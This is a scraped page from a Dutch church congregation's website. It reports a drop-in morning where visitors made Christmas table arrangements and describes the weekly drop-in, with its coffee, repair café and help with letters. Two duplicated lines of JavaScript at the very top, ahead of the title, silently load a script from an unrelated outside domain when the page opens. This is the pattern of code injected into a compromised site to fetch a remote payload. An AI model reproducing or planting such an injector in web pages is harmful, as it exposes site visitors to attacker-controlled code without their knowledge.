;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Inloopochtend It Trefpunt ... kerststukjes ! - PKN Damwâld

Inloopochtend It Trefpunt … kerststukjes !

Gepubliceerd op: vrijdag 9 december 2022

Agelopen donderdag was het een drukte van belang bij de inloopochtend It Trefpunt, dat elke donderdag wordt gehouden in De Ontmoeting. Op het programma stond het maken van kerststukjes.  Het resultaat mocht er zijn! Een mooi kerststuk op tafel draagt altijd bij aan de sfeer in huis en hoe leuk is het als je het zelf hebt gemaakt. Al met al werd het een creatieve en gezellige morgen met prachtige kerststukken als resultaat. Voor foto’s zie het bijgaande fotoalbum.

Elke donderdagochtend is er Inloop vanaf 09.30 uur. In het voorjaar van 2016 is hiermee gestart en het is een groot succes. Iedereen, oud of jong en kerkelijk of niet, is van harte welkom. Er is gratis koffie/thee/fris en u kunt de krant lezen, spelletjes doen of gezellig met elkaar praten. Er zijn ook veel boeken en tijdschriften die u kunt meenemen. U mag ook eigen boeken inleveren. Regelmatig is er tijd voor het maken van (wens) kaarten of bloemstukjes of voor schilderen en kwissen. Kapotte (elektrische) spulletjes meenemen voor ons repaircafe mag, indien u geen financiële of andere mogelijkheden heeft om die te laten maken. Wij bieden hulp bij moeilijke (financiële) brieven en vervoer als u naar de Inloopochtenden wilt of ergens anders naar toe moet bijv. het ziekenhuis. Voorlichting, over Zorg en WMO, krijgt u van het Friese Land, Zorgcombinatie Interzorg of de Buurtzorg. Medewerksters van die organisaties zijn om beurten aanwezig.

Donderdag is de volgende It trefpunt en we nodigen iedereen van harte uit!